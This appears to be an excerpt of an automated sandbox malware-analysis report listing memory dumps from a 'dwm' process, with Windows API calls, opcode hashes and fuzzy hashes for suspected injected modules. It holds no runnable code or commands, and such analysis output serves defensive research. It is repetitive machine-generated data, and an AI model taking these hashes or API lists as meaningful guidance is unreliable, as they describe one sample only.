                                                          • Instruction Fuzzy Hash: 8F114976614B4082E7109B25F85835A7770F389BE4FA44315EA9D03AA8DF3CC258CB55
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2062869608.000002BAAF190000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF190000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaf190000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 7f99631df70bc27f49c937bf693204d986050030828864c49767fd9d7b1a80e9
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: 1A81812361024186FA5CAB6698C93997FF1AF867C0F44412BDB08C7796DB3BC945C7A3
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: b2ee973e34825ad9dca60c71bed8b459903fc17ef75a7d459709b68d4c84bc08
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: E781F1257002418AFA50AB659C5D3A973B1AB85B84F748415AACC67FD6FB3BCD41C333
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2183641314.000002BAAEDD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaedd0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 044a2af7b68ccd40a4f16dcda0e18dde777fe5d8773e7e20f0072ecd4716c4b0
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: E981C020B022414AFB64AB6598CD3AD37B0AB86780F7451A79ACCC77D6DB38C855C773
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2236561607.000002BAAEE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEE30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaee30000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: e312396b39606af4d997e29cc141288cd9959707db47f0e5c049d50a50ee6aed
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: 3D81CF217006427AFA74AB65984D39B73F1AB86B80F7C4115AEC947F96DB39C842C723
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID:
                                                          • API String ID: 190073905-0
                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction ID: 0693b83c5bc9acea3d2881afc43fa6cc3fc49127075a1a3dfe8cc688cbd48b08
                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                          • Instruction Fuzzy Hash: ED810520780681B6FAF0BB65945D36973B0AB96781F744015AAC847FD7EB38C885C737
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002BAAED99C6B,?,?,?,000002BAAED9945C,?,?,?,?,000002BAAED98F65), ref: 000002BAAED99B31
                                                          • GetLastError.KERNEL32(?,?,?,000002BAAED99C6B,?,?,?,000002BAAED9945C,?,?,?,?,000002BAAED98F65), ref: 000002BAAED99B3F
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002BAAED99C6B,?,?,?,000002BAAED9945C,?,?,?,?,000002BAAED98F65), ref: 000002BAAED99B69
                                                          • FreeLibrary.KERNEL32(?,?,?,000002BAAED99C6B,?,?,?,000002BAAED9945C,?,?,?,?,000002BAAED98F65), ref: 000002BAAED99BD7
                                                          • GetProcAddress.KERNEL32(?,?,?,000002BAAED99C6B,?,?,?,000002BAAED9945C,?,?,?,?,000002BAAED98F65), ref: 000002BAAED99BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction ID: 01f312c05cdd55351d2ac3ba235fd760506b2fe5af5c8cc90a55e232e2a4baf9
                                                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction Fuzzy Hash: 9331A12131264092EE11AB16AC887A533F4BB44BA8F790625ED9D47B90FF3DC854C322
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002BAAEE09C6B,?,?,?,000002BAAEE0945C,?,?,?,?,000002BAAEE08F65), ref: 000002BAAEE09B31
                                                          • GetLastError.KERNEL32(?,?,?,000002BAAEE09C6B,?,?,?,000002BAAEE0945C,?,?,?,?,000002BAAEE08F65), ref: 000002BAAEE09B3F
                                                          • LoadLibraryExW.KERNEL32(?,?,?,000002BAAEE09C6B,?,?,?,000002BAAEE0945C,?,?,?,?,000002BAAEE08F65), ref: 000002BAAEE09B69
                                                          • FreeLibrary.KERNEL32(?,?,?,000002BAAEE09C6B,?,?,?,000002BAAEE0945C,?,?,?,?,000002BAAEE08F65), ref: 000002BAAEE09BD7
                                                          • GetProcAddress.KERNEL32(?,?,?,000002BAAEE09C6B,?,?,?,000002BAAEE0945C,?,?,?,?,000002BAAEE08F65), ref: 000002BAAEE09BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                          • String ID: api-ms-
                                                          • API String ID: 2559590344-2084034818
                                                          • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction ID: 9d42ed71ee45f3b4d5c1312fa78594dba90501ccc8d2a55312c04eb523f1c0fc
                                                          • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                          • Instruction Fuzzy Hash: F331A321352A40A1EEB1DF4698087A533B4B794BB0F690625DD9D4BB94EF39CC44C726
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction ID: e1abb664a91a57423b12d2f494e3f1e41a9cdc7a412b6d31af6d9dae86cd6057
                                                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction Fuzzy Hash: 4911BF31310B8086E7509B52E85871D77B1F388FE4F604624EA9E87BD4DF78CA24C755
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction ID: a919c63cfe1eb2905e8ec9dc5028b144f8b95960abdd6eb95fa4e46fe3bcec8f
                                                          • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                          • Instruction Fuzzy Hash: B7119D31310B4096E7609B92E85871977B0F398BE4FA00224EA9E87FD4DF3CC848C751
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction ID: 649c0a22422b02da4e256086d10b0a5bdd3e1d142a559b51b9722f9d04f35645
                                                          • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                          • Instruction Fuzzy Hash: 87D19D76244B8895DAB0DB0AE49835A77B0F3C8B98F200126EACD47FA9DF3DC551CB51
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Free$CurrentThread
                                                          • String ID:
                                                          • API String ID: 564911740-0
                                                          • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction ID: 5d987100bd7a9682b01af306e397790e2a51e6df67ab5f07f856803d75bedfc2
                                                          • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                          • Instruction Fuzzy Hash: E351A531201B4595FF05EB29EC9829833B1FB44744FA40929A5AD07BA5FF7AC929C372
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: $nya-
                                                          • API String ID: 756756679-1266920357
                                                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction ID: 2d31f3d6e6c5a3b540286d699732f80ee8b7a5f3e1ae2d2c891674388e650171
                                                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction Fuzzy Hash: E231AE22701B5192EB15DF26E948369B3B1FB84B84F2844248F8C47B55FF39C861C711
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID: $nya-
                                                          • API String ID: 756756679-1266920357
                                                          • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction ID: ae2828988b5da7c2c292b1821a15e89ffa856a4605bcba0e02ad8e018266d514
                                                          • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                          • Instruction Fuzzy Hash: BE31AB22701B51A2EAB5DF26F948329B3B0FB54B84F2880208FC907F55EF38C5A5C721
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$Value$FreeHeap
                                                          • String ID:
                                                          • API String ID: 365477584-0
                                                          • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction ID: ed1152b422595425cd4bd64c1d17a41f84522a149bdacc2ff6543c64706649a6
                                                          • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                                          • Instruction Fuzzy Hash: 2A114F2170124092FA1867316E1D37E3372AB85794F784624A8EE57BC6EF39CD11C322
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction ID: 723a3a8ccdbd693f352db1ebdb64092767e7ae56dcd19bed17b5c447b8d32557
                                                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction Fuzzy Hash: 8B016D61700B4086EB10EB22A85835973B1F788FC0FA84434DE9D43B54DF7CCA9AC761
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID:
                                                          • API String ID: 517849248-0
                                                          • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction ID: 5e7d2506bc9458f767f75fb30931a2999dc425b9a3afebb7208a4b32c288ee17
                                                          • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                          • Instruction Fuzzy Hash: 76012D21704B4096EB64EB52A89835973B1F798FC0FA84035DE9D47B58DF3CC589C761
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction ID: 761de77342e0a94ec601f240c61f51920176bd37b2ed316876ae5e8853eba589
                                                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction Fuzzy Hash: AE010CA5611B4082FB24AB25E84C71A73B0BB59B45F240528DACD077A4FF3EC558C766
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                          • String ID:
                                                          • API String ID: 449555515-0
                                                          • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction ID: 392d63d54875a93460372a60c02581be9458fcb3ef55fb9cda753c82608c2e14
                                                          • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                          • Instruction Fuzzy Hash: AD012D65311B4092FB74ABA1E84C71573B0BB59B45F240028CACD06B69EF3DC688C722
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: FinalHandleNamePathlstrlen
                                                          • String ID: \\?\
                                                          • API String ID: 2719912262-4282027825
                                                          • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction ID: 75424da5193fec2bc580ef6704e44c067a8ded6da23e8cd08b40ddfe050d8d1b
                                                          • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                                          • Instruction Fuzzy Hash: 19F0C26230468492EB20AF20F8C8359B371F784B98FD44025CACD43994EF7DCB99CB21
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
